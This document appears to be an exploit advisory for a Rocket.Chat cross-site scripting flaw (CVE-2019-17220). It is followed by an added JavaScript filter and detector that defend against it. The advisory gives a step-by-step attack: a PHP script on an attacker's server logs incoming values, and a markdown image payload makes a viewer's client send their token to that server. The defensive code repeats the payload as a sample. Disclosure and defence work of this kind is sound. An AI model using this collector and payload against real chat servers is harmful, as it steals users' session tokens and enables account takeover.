As I found out, the service has a security problem that will lead to the disclosure of user information.
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server you control. It appends whatever arrives in the "leet" query parameter to logs.txt:

    <?php
    // Open (or create) the log file in append mode.
    $output = fopen("logs.txt", "a+") or die("WTF? o.O");
    // Record the exfiltrated value, one entry per line pair.
    $leet = $_GET['leet']."\n\n";
    fwrite($output, $leet);
    fclose($output);
    ?>

2. Open a chat session.

3. Send the payload as a markdown image whose URL points at your web server:

    ![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. The token is written to logs.txt once the target views your message.
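The payload above works because an image link in a message is turned into a fetch of an attacker-controlled URL, and that URL carries a template marker that the renderer fills with sensitive data before the request goes out. The following is an added example, not code from the advisory or from Rocket.Chat: a small filter that refuses image URLs containing template markers (backticks, brace placeholders) before they reach a renderer, and a detector that flags stored messages shaped like the exfiltration payload. The markdown image syntax, the marker set, the message objects and the sample messages (including the advisory's placeholder host 10.10.1.5) are simplifying assumptions for illustration; the real rendering pipeline is not modelled.

```javascript
// Added example: defensive filter for markdown image links plus a detector
// for token-exfiltration payloads. Not part of the advisory or Rocket.Chat.

// Assumed simplified markdown image syntax: ![alt](url)
const IMAGE_MD = /!\[([^\]]*)\]\(([^)\s]+)\)/g;

// Sequences that never belong in a legitimate image URL but appear in the
// advisory's payload: backticks and brace-wrapped template placeholders.
const TEMPLATE_MARKERS = /`|\{[^}]*\}/;

// Returns true only for absolute http(s) URLs with no template markers.
function isSafeImageUrl(raw) {
  if (TEMPLATE_MARKERS.test(raw)) return false;
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return false; // relative or malformed: reject rather than guess
  }
  return url.protocol === 'http:' || url.protocol === 'https:';
}

// Rewrites a message so image links with unsafe URLs are neutralised:
// they become inert text instead of triggering a fetch of the URL.
function sanitizeImageLinks(message) {
  return message.replace(IMAGE_MD, (match, alt, href) =>
    isSafeImageUrl(href) ? match : `[blocked image: ${alt}]`
  );
}

// Detection over stored messages: report any image URL carrying template
// markers, i.e. the shape of the advisory's token-exfiltration payload.
function findExfilPayloads(messages) {
  const hits = [];
  for (const m of messages) {
    for (const [, , href] of m.text.matchAll(IMAGE_MD)) {
      if (TEMPLATE_MARKERS.test(href)) {
        hits.push({ user: m.user, href });
      }
    }
  }
  return hits;
}

// Constructed sample messages (assumed shape, not real chat data). The
// second mirrors the advisory's payload against its placeholder host.
const SAMPLE_MESSAGES = [
  { user: 'alice', text: 'Look: ![cat](https://example.com/cat.png)' },
  { user: 'mallory', text: '![title](http://10.10.1.5/l33t.php?leet=+`{}token`)' },
  { user: 'bob', text: 'no images here' },
];

// Stand-alone run: print what the detector finds in the samples.
console.log(findExfilPayloads(SAMPLE_MESSAGES));
```

Run it with `node` to see the single flagged message from mallory. Rejecting the marker characters outright is deliberately coarse: a renderer that substitutes placeholders should never receive user-controlled text containing them, so a strict allowlist (absolute http(s), no template syntax) is safer than trying to escape them after the fact.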